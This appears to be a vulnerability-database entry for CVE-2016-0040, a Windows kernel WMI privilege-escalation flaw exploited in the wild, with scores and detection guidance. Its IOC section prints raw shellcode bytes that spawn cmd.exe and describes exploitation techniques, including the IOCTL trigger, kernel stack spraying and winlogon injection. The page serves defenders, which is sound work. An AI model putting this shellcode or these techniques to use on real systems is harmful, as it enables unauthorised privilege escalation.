cbcvebase.
CVE-2016-0040
published 2016-02-10

CVE-2016-0040: The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted…

PriorityP179high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-18
Exploited in the wild
EPSS
24.55%
97.6th percentile
The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."

Affected

1 ranges
VendorProductVersion rangeFixed in
microsoftwindows_server_2008

Detection & IOCsextracted from sources · hover to see the quote

path\\.\WMIDataDevice
otherIOCTL_WMI_RECEIVE_NOTIFICATIONS = CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
pathdata/exploits/CVE-2016-0040/CVE-2016-0040.x64.dll
commandRECEIVE_ACTION_CREATE_THREAD (value: 2)
bytes
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00
  • Monitor DeviceIoControl calls targeting the WMIDataDevice driver handle with IOCTL code 0x51 (IOCTL_WMI_RECEIVE_NOTIFICATIONS). This is the specific IOCTL used to trigger the uninitialized stack variable in ntoskrnl's WMI subsystem.
  • Detect processes opening a handle to \\.\WMIDataDevice with GENERIC_READ | GENERIC_WRITE access from non-system, non-WMI processes, especially when followed by DeviceIoControl.
  • The Metasploit module injects a DLL named CVE-2016-0040.x64.dll into a spawned notepad.exe process. Detect reflective DLL injection into notepad.exe, or the presence of this DLL filename on disk or in memory.
  • The exploit targets the WMI subsystem of ntoskrnl using an uninitialized stack variable. Alert on unexpected kernel-mode code execution originating from WMI receive notification paths on Windows 7 SP0/SP1 x64.
  • The x86 PoC exploit allocates executable memory at fixed virtual address 0x2a000000 (VirtualAlloc with MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE). Detect low-entropy fixed-address executable allocations at this address from user-mode processes.
  • The x86 PoC uses ZwMapUserPhysicalPages (from NTDLL) to spray the kernel stack with a controlled value derived from HalDispatchTable. Monitor for unusual calls to ZwMapUserPhysicalPages from non-system processes.
  • The shellcode in the x86 PoC spawns cmd.exe by injecting into winlogon.exe via CreateRemoteThread. Detect CreateRemoteThread calls targeting winlogon.exe from unprivileged processes.
  • ·The Metasploit module explicitly targets only Windows 7 SP0 and SP1 x64 builds; running against WOW64 (32-bit session on 64-bit OS) is not supported and will fail.
  • ·The x86 PoC (EDB-40039) overwrites HaliSystemQueryInformation but does not restore it, meaning a BSOD will occur at some point after exploitation — useful for distinguishing attempted exploitation from normal activity.
  • ·The Metasploit module requires an existing Meterpreter session and will abort if the session is already SYSTEM-level.

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.